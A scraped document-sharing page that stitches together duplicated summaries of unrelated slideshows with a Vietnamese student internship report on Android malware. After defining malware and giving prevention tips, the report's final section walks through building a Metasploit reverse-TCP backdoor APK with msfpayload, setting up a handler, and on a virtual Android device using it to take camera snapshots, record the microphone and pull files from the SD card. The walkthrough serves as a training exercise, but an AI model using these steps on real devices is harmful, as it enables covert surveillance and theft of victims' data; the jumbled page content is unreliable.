Modern Malware and Threats discusses the landscape of modern malware threats. It defines malware as software used to disrupt systems or steal information. Modern malware is more stealthy, targeted, and uses distributed infrastructure compared to traditional malware. It can persist through backdoors, rootkits, or bootkits and communicates covertly through various protocols. Defenses include antivirus, firewalls, hardening systems, and monitoring logs. The document provides examples of advanced malware strains and recommendations for detection and mitigation techniques.
This document discusses mobile malware and how to protect against it. It begins by defining malware and listing common types. It then provides statistics on the distribution of mobile operating systems and malware detections. The document outlines sources of mobile malware infections and discusses why mobile devices contain sensitive information. It recommends implementing mobile device management to centrally manage devices and deploy security policies. Examples of recent mobile threats are also described. The document concludes by recommending security best practices like using antivirus software, updating devices, and educating users.
[Android] Publish on Google Play & Google AnalyticsNatã Melo
Publish on Google Play and Google Analytics provide essential tools for app developers. Google Play allows developers to register an account, set up merchant accounts, and publish apps. Google Analytics enables developers to monitor user behavior, interactions, payments, and create metrics from reports. It is a vital part of the development process to identify improvements and maximize success.
Mobile security mobile malware countermeasure academic csirtIGN MANTRA
The document discusses mobile trends, the rise of smartphones, and mobile malware threats. It notes that smartphones reached 30% of the global mobile market in 2011. It also discusses the rise of Android as the dominant smartphone OS and how this benefited companies like Samsung and HTC. The document outlines several types of mobile malware and statistics on mobile malware infections. It describes how mobile malware can steal private information or control devices. Finally, it provides tips on securing mobile devices and awareness of mobile security issues.
This document provides an overview of Android security at the system, application, and enterprise levels. At the system level, it discusses Android architecture, sandboxing, permissions, and security measures like ASLR and NX-bit. It describes application security features like intents, permissions, and application signing. Finally, it outlines enterprise security capabilities such as full-disk encryption, device policies for remote wipe/location, and VPN integration.
This document provides an overview of Android application sandboxes and how they can be used for suspicious software detection. It discusses how Android uses a modified Linux kernel to run Java-based apps in an isolated environment. The document describes how an Android application sandbox called AASandbox works by hijacking system calls using a loadable kernel module and then performing both static analysis of app files and dynamic analysis by running apps in an Android emulator and monitoring system calls. It provides examples of analyzing self-written apps and experiments using over 150 popular apps from the Android Market.
The document discusses permissions in Android security and outlines 3 main threats: permission re-delegation, over-privileged apps, and permission inheritance. It then describes 11 proposed solutions to these threats, categorizing each solution by type (system modification, Android service, or non-Android app), implementation level (system, app, or separate system), and running mode (static or dynamic). Finally, it notes areas for future work, such as combining solutions and evaluating solutions based on factors like performance and complexity.
Video at http://mrkn.co/andsec
With Android activations reaching a million devices per day, it is no surprise that security threats against our favorite mobile platform have been on the rise.
In this session, you will learn all about Android's security model, including application isolation (sandboxing) and provenance (signing), its permission system and enforcement, data protection features and encryption, as well as enterprise device administration.
Together, we will dig into Android's own internals to see how its security model is applied through the entire Android stack - from the Linux kernel, to the native layers, to the Application Framework services, and to the applications themselves.
Finally, you’ll learn about some of the weaknesses in the Android's model (including rooting, tap-jacking, malware, social-engineering) as well as what can be done to mitigate those threats, such as SE-Linux, memory protection, anti-malware, firewall, and developer best practices.
By the end of this session you will have a better understanding of what it takes to make Android a more trusted component of our personal and professional lives.
The document discusses different aspects of city life including transportation, entertainment, accommodations, shopping, and education opportunities. It also compares life in cities to life in rural areas. Some words used to describe cities are beautiful, artistic, crowded, stressful, modern, and polluted. Rural areas are described as calm, peaceful, and having access to nature. The document prompts the reader to discuss advantages and disadvantages of both areas with a partner.
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
Ajin Abraham presents the Mobile Security Framework, an open source tool for automating security analysis of Android and iOS mobile applications. It performs static analysis on application binaries and source code to detect vulnerabilities. It also includes dynamic analysis capabilities like monitoring network traffic, system calls and application data during runtime. The tool is hosted locally and does not send any data to the cloud. The talk demonstrates the tool's static and dynamic analysis features and provides examples of vulnerabilities it has discovered in real world applications. Future plans are discussed to add additional testing capabilities and improve the tool. Users are encouraged to download, test and contribute to the open source project.
Báo Cáo Thực Tập ATHENA Tuần 5 :Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION
II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID
III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE
IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX
V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC
Modern Malware and Threats discusses the landscape of modern malware threats. It defines malware as software used to disrupt systems or steal information. Modern malware is more stealthy, targeted, and uses distributed infrastructure compared to traditional malware. It can persist through backdoors, rootkits, or bootkits and communicates covertly through various protocols. Defenses include antivirus, firewalls, hardening systems, and monitoring logs. The document provides examples of advanced malware strains and recommendations for detection and mitigation techniques.
This document discusses mobile malware and how to protect against it. It begins by defining malware and listing common types. It then provides statistics on the distribution of mobile operating systems and malware detections. The document outlines sources of mobile malware infections and discusses why mobile devices contain sensitive information. It recommends implementing mobile device management to centrally manage devices and deploy security policies. Examples of recent mobile threats are also described. The document concludes by recommending security best practices like using antivirus software, updating devices, and educating users.
[Android] Publish on Google Play & Google AnalyticsNatã Melo
Publish on Google Play and Google Analytics provide essential tools for app developers. Google Play allows developers to register an account, set up merchant accounts, and publish apps. Google Analytics enables developers to monitor user behavior, interactions, payments, and create metrics from reports. It is a vital part of the development process to identify improvements and maximize success.
Mobile security mobile malware countermeasure academic csirtIGN MANTRA
The document discusses mobile trends, the rise of smartphones, and mobile malware threats. It notes that smartphones reached 30% of the global mobile market in 2011. It also discusses the rise of Android as the dominant smartphone OS and how this benefited companies like Samsung and HTC. The document outlines several types of mobile malware and statistics on mobile malware infections. It describes how mobile malware can steal private information or control devices. Finally, it provides tips on securing mobile devices and awareness of mobile security issues.
This document provides an overview of Android security at the system, application, and enterprise levels. At the system level, it discusses Android architecture, sandboxing, permissions, and security measures like ASLR and NX-bit. It describes application security features like intents, permissions, and application signing. Finally, it outlines enterprise security capabilities such as full-disk encryption, device policies for remote wipe/location, and VPN integration.
This document provides an overview of Android application sandboxes and how they can be used for suspicious software detection. It discusses how Android uses a modified Linux kernel to run Java-based apps in an isolated environment. The document describes how an Android application sandbox called AASandbox works by hijacking system calls using a loadable kernel module and then performing both static analysis of app files and dynamic analysis by running apps in an Android emulator and monitoring system calls. It provides examples of analyzing self-written apps and experiments using over 150 popular apps from the Android Market.
The document discusses permissions in Android security and outlines 3 main threats: permission re-delegation, over-privileged apps, and permission inheritance. It then describes 11 proposed solutions to these threats, categorizing each solution by type (system modification, Android service, or non-Android app), implementation level (system, app, or separate system), and running mode (static or dynamic). Finally, it notes areas for future work, such as combining solutions and evaluating solutions based on factors like performance and complexity.
Video at http://mrkn.co/andsec
With Android activations reaching a million devices per day, it is no surprise that security threats against our favorite mobile platform have been on the rise.
In this session, you will learn all about Android's security model, including application isolation (sandboxing) and provenance (signing), its permission system and enforcement, data protection features and encryption, as well as enterprise device administration.
Together, we will dig into Android's own internals to see how its security model is applied through the entire Android stack - from the Linux kernel, to the native layers, to the Application Framework services, and to the applications themselves.
Finally, you’ll learn about some of the weaknesses in the Android's model (including rooting, tap-jacking, malware, social-engineering) as well as what can be done to mitigate those threats, such as SE-Linux, memory protection, anti-malware, firewall, and developer best practices.
By the end of this session you will have a better understanding of what it takes to make Android a more trusted component of our personal and professional lives.
The document discusses different aspects of city life including transportation, entertainment, accommodations, shopping, and education opportunities. It also compares life in cities to life in rural areas. Some words used to describe cities are beautiful, artistic, crowded, stressful, modern, and polluted. Rural areas are described as calm, peaceful, and having access to nature. The document prompts the reader to discuss advantages and disadvantages of both areas with a partner.
Automated Security Analysis of Android & iOS Applications with Mobile Securit...Ajin Abraham
Ajin Abraham presents the Mobile Security Framework, an open source tool for automating security analysis of Android and iOS mobile applications. It performs static analysis on application binaries and source code to detect vulnerabilities. It also includes dynamic analysis capabilities like monitoring network traffic, system calls and application data during runtime. The tool is hosted locally and does not send any data to the cloud. The talk demonstrates the tool's static and dynamic analysis features and provides examples of vulnerabilities it has discovered in real world applications. Future plans are discussed to add additional testing capabilities and improve the tool. Users are encouraged to download, test and contribute to the open source project.
Báo Cáo Thực Tập ATHENA Tuần 5 :Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài.
KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION
II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID
III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE
IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX
V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID:
VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC
Smartbiz_He thong MES nganh may mac_2024juneSmartBiz
Cách Hệ thống MES giúp tối ưu Quản lý Sản xuất trong ngành May mặc như thế nào?
Ngành may mặc, với đặc thù luôn thay đổi theo xu hướng thị trường và đòi hỏi cao về chất lượng, đang ngày càng cần những giải pháp công nghệ tiên tiến để duy trì sự cạnh tranh. Bạn đã bao giờ tự hỏi làm thế nào mà những thương hiệu hàng đầu có thể sản xuất hàng triệu sản phẩm với độ chính xác gần như tuyệt đối và thời gian giao hàng nhanh chóng? Bí mật nằm ở hệ thống Quản lý Sản xuất (MES - Manufacturing Execution System).
Hãy cùng khám phá cách hệ thống MES đang cách mạng hóa ngành may mặc và mang lại những lợi ích vượt trội như thế nào.
2. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
2
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÀI BÁO CÁO 2
ANDROID MALWARE VÀ CÁCH HACK
ANDROID
CBHD: Võ Đỗ Thắng
SVTT: Nguyễn Tuấn Kiệt
3. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
3
Mục lục
1. Malware là gì?.....................................................................................................................................4
2. Phân loại ..............................................................................................................................................5
3. Dấu hiệu bị nhiễm các phần mềm độc hại ........................................................................................5
4. Loại bỏ phần mềm độc hại từ Android.............................................................................................6
5. Một số cách hạn chế lây nhiễm ..........................................................................................................6
6. Hack android bằng metasploit trên Kali Linux ...............................................................................7
4. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
4
1. Malware là gì?
Malware (phần mềm độc hại) viết tắt của cụm từ Malicious Sofware, là một phần mềm máy tính
được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc và thay đổi các thực thi của hệ điều hành
cũng như các chương trình ứng dụng mà không có sự cho phép của người dùng và bằng một cách
nào đó mà người dùng nếu không để ý cũng không thể phát hiện được những thay đổi đó.
Phần mềm độc hại đã xuất hiện từ rất lâu trên những hệ điều hành máy tính như Windows, các
máy tính MAC và Linux (ở một mức độ thấp hơn), và bây giờ nó đã trở thành một mối nguy hại
không nhỏ cho các thiết bị di động chạy Android. Sự có mặt của Android khiến cho các phần mềm
độc hại thêm phần thích thú, tích cực tấn công hơn tới đông đảo người dùng Android. Nói về vấn
đề này, Timothy Armstrong, một chuyên gia bảo mật tại Kaspersky Lab, cho biết: “Malware trên
Android được phát hiện nhiều hơn hầu như mỗi ngày. Thời gian gần đây, chúng tôi đã phát hiện
ra ba nhà phát triển ứng dụng (mà có khi là từ cùng 1 người) với tên gọi MYOURNET,
Kingmall2010, we20092020 đã cung cấp các ứng dụng để tải về miễn phí trên Android Market,
mà hầu hết các ứng dụng đó đều chứa mã độc”.
5. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
5
Năm 2012 là năm thứ hai cho thấy sự bùng nổ của phần mềm độc hại cho Android. Từ tám chương
trình độc hại duy nhất vào tháng 1 năm 2011, tỷ lệ phát hiện trung bình hàng tháng phần mềm độc
hại mới tấn công vào Android trong năm 2011 đã lên đến hơn 800 mẫu. Trong năm 2012,
Kaspersky Lab đã xác định trung bình 6.300 mẫu phần mềm độc hại trên thiết bị di động mới mỗi
tháng. Nhìn chung, trong năm 2012 số lượng mẫu độc hại cho Android được biết đến nhiều tăng
hơn tám lần.
2. Phân loại
Đa số các phần mềm độc hại Android có thể được chia thành ba nhóm chính dựa theo chức năng:
- SMS Trojans: bòn rút tài khoản di động của các nạn nhân bằng cách gửi tin nhắn SMS đến
các số điện thoại được đánh giá cao.
- Backdoors: cung cấp truy cập trái phép vào smartphone, cài đặt các chương trình độc hại
khác hoặc ăn cắp dữ liệu cá nhân của người dùng.
- Cuối cùng là các phần mềm gián điệp nhằm mục tiêu thu thập trái phép dữ liệu cá nhân,
chẳng hạn như sổ địa chỉ và mật khẩu (hoặc thậm chí hình ảnh cá nhân).
Trong nửa đầu năm 2012, Backdoors, tin nhắn SMS, Trojans và phần mềm gián điệp chiếm 51%
các phần mềm độc hại cho Android mới được phát hiện. Trong bảng xếp hạng Top Ten phần mềm
độc hại cho Android đã bị chặn bởi Kaspersky Mobile Security hoặc Kaspersky Tablet Security,
SMS Trojans là phổ biến nhất và các ứng dụng hiển thị quảng cáo không mong muốn cho người
sử dụng ở vị trí thứ hai. Ít phổ biến rộng rãi nhưng nguy hiểm nhất là Trojans ngân hàng trên di
động thường xuyên làm việc kết hợp với các máy tính để bàn, ví dụ như Carberp.
Nền tảng Android cho phép cài đặt phần mềm từ các nguồn không tin cậy, và là một trong những
cách tốt nhất để đảm bảo sự lây nhiễm từ việc cài đặt các chương trình từ những trang web đáng
ngờ. Tuy nhiên, phần mềm độc hại trên nền tảng phân phối ứng dụng chính thức Google Play là
một xu hướng bắt đầu vào năm 2011 và tiếp tục trong năm 2012, bất chấp những nỗ lực tốt nhất
của Google để làm giảm hoạt động tội phạm mạng. Một trong những ví dụ “khác thường” nhất
của phần mềm độc hại trên di động trong năm 2012 là "Find and Call", ứng dụng đã len lỏi được
vào Google Play cũng như kho ứng dụng của Apple.
3. Dấu hiệu bị nhiễm các phần mềm độc hại
Cũng giống như trên máy tính, khi bị nhiễm malware, thiết bị Android của bạn sẽ có một số hành
động khác thường và bạn không thể thay đổi được bất kỳ điều gì.
- Sử dụng dữ liệu không rõ ràng: có rất nhiều phần mềm độc hại tồn tại để thu thập dữ liệu
về tài khoản, số thẻ tín dụng, danh bạ, vv... Một khi có được các thông tin này, nó sẽ tự
động được chuyển tiếp về cho người đã tạo ra nó. Và trong nhiều trường hợp, việc chuyển
giao thông tin này sẽ dẫn đến sự khác lạ trong sử dụng dữ liệu.
- Hiệu suất của thiết bị kém: tùy thuộc vào thời gian sử dụng và mức độ nghiêm trọng của
việc lây nhiễm mà hiệu suất điện thoại của bạn sẽ bị giảm đi nhiều hay ít, đặc biệt là khi
bạn đã khởi động lại thiết bị mà các vấn đề không được giảm bớt.
6. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
6
- Thời lượng pin bị giảm: do hầu hết các phần mềm độc hại đều được thiết kế để chạy nền
trong hệ thống, nên nó sẽ làm sụt giảm đáng kể thời lượng pin trên thiết bị của bạn.
4. Loại bỏ phần mềm độc hại từ Android
Cách tốt nhất để loại bỏ malware là cài thêm một chương trình chống virus trên thiết bị. Tuy nhiên,
bạn hãy cẩn thận và chỉ cài đặt các ứng dụng có tên tuổi được nhiều người sử dụng, nếu không thì
bạn sẽ lại rước thêm của nợ về máy. Dưới đây là một số phần mềm miễn phí mà bạn có thể tham
khảo:
- Avast! Mobile Security (http://itechnews360.com/avastmobile): chương trình có thể quét
toàn bộ ứng dụng trên thiết bị theo lựa chọn của người dùng, hoặc tự động quét theo lịch
trình được đặt sẵn. Khi duyệt web, nó sẽ phát hiện và ngăn chặn các liên kết nhiễm
malware, giám sát lưu lượng truy cập ra và vào. Bên cạnh đó, nó còn các tính năng tiên
tiến khác như chống trộm, tường lửa thông minh và lọc các tin nhắn SMS hoặc cuộc gọi.
- AVG Antivirus Security (http://itechnews360.com/avgsecurity): ứng dụng này sẽ quét tất
cả các tập tin mới và các ứng dụng mà nó nghi ngờ, sau đó, cung cấp cho bạn các thiết lập
và những lời khuyên để xử lý các lỗ hổng bảo mật. Nó cũng được trang bị thêm một số tính
năng tiên tiến khác như giám sát băng thông và các biện pháp chống trộm.
- 360 Mobile Security (http://itechnews360.com/360security): cung cấp các bảo vệ dựa vào
cơ sở dữ liệu luôn được cập nhật trên đám mây, giúp bạn phát hiện các lỗ hổng bảo mật và
tối ưu hóa các thiết lập tự động. Nhìn chung, đây là chương trình chống virus dễ sử dụng
và có giao diện khá đẹp mắt.
5. Một số cách hạn chế lây nhiễm
Cách duy nhất để ngăn chặn phần mềm độc hại là hạn chế tải về các ứng dụng từ bên ngoài Google
Play, không cắm thiết bị Android vào máy tính (thay vào đó hãy sử dụng các ứng dụng để biến
Android thành ổ đĩa mạng, chẳng hạn như là AirDroid, DroidNAS, vv...), và áp dụng thêm một số
mẹo nhỏ dưới đây:
- Kiểm tra đánh giá ứng dụng: khi bạn tìm thấy một ứng dụng mới và muốn cài đặt, điều đầu
tiên bạn nên làm là tìm đọc những nhận xét từ những người dùng khác. Qua đó, bạn có thể
cảm nhận được phần nào về ứng dụng và đưa ra những quyết định đúng đắn.
- Kiểm tra hồ sơ của nhà phát triển: nếu chưa an tâm với những đánh giá của người dùng,
bạn hãy tiếp tục kiểm tra thêm phần hồ sơ của nhà phát triển ứng dụng để xem nó có đáng
tin cậy hay không.
- Hãy xem rõ các điều lệ khi cấp quyền cho ứng dụng: khi bấm nút Install để thiết bị bắt đầu
tải về và cài đặt, bạn hãy xem rõ toàn bộ các quyền mà ứng dụng yêu cầu, nếu thấy có điều
gì đó quá đáng hoặc không hợp lý, hãy ngưng việc cài đặt ngay lập tức. Chẳng hạn như các
ứng dụng đọc báo, đọc truyện hay xem tivi mà lại có yêu cầu gửi tin nhắn đi từ điện thoại
của bạn là không hợp lý!
- Thường xuyên quét toàn bộ thiết bị: để thực hiện việc này, bạn có thể cài đặt một trong các
phần mềm chống virus được giới thiệu bên trên, và hãy quét qua toàn bộ thiết bị mỗi ngày,
hoặc ít nhất mỗi tuần một lần.
7. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
7
6. Hack android bằng metasploit trên Kali Linux
Trước tiên chúng ta sẽ tạo ra một backdoor bằng cách dùng lệnh:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.159.128 lport=8080 R >
/root/Desktop/app.apk
Trong đó 192.168.159.128 là địa chỉ ip của máy Kali. Chúng ta có thể xem nó bằng cách dùng
lệnh:
ifconfig
8. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
8
Và đây là file app.apk mà chúng ta vừa tạo
Tiếp theo chúng ta mở metasploit bằng cách dùng lệnh:
msfconsole
9. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
9
Chúng ta cài đặt các thông số cần thiêt
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.159.128
set lport 8080
Với lhost và lport giống với khi chúng ta tạo file app.apk
Ta mở một cái android ảo và tải về file app.apk, cài đặt và mở lên được giao diện như dưới, nhấp
vào nút Reverse_tcp:
10. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
10
Vậy là ta đã kết nối thành công tới máy android này, ở msfconsole sẽ như sau:
Để xem thông tin về máy, nhập lệnh sysinfo
Sử dụng camera:
Để xem danh sách camera, nhập webcam_list
11. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
11
Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách camera
ở phần trước. Ví dụ như sau:
Ghi âm
Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy
12. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
12
Lấy file từ sd card
Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục
Ta tải file app.apk trong thư mục Download của sdcard
Dùng lệnh cd /sdcard/Download để vào thư mục
13. SVTT: Nguyễn Tuấn Kiệt Ca sáng 2-4-6
13
Như trên hình, ta thấy 1 file là app.apk, để tải về máy, ta nhập lệnh
download app.apk
Và file này sẽ được tải về thư mục root của máy Kali
Hết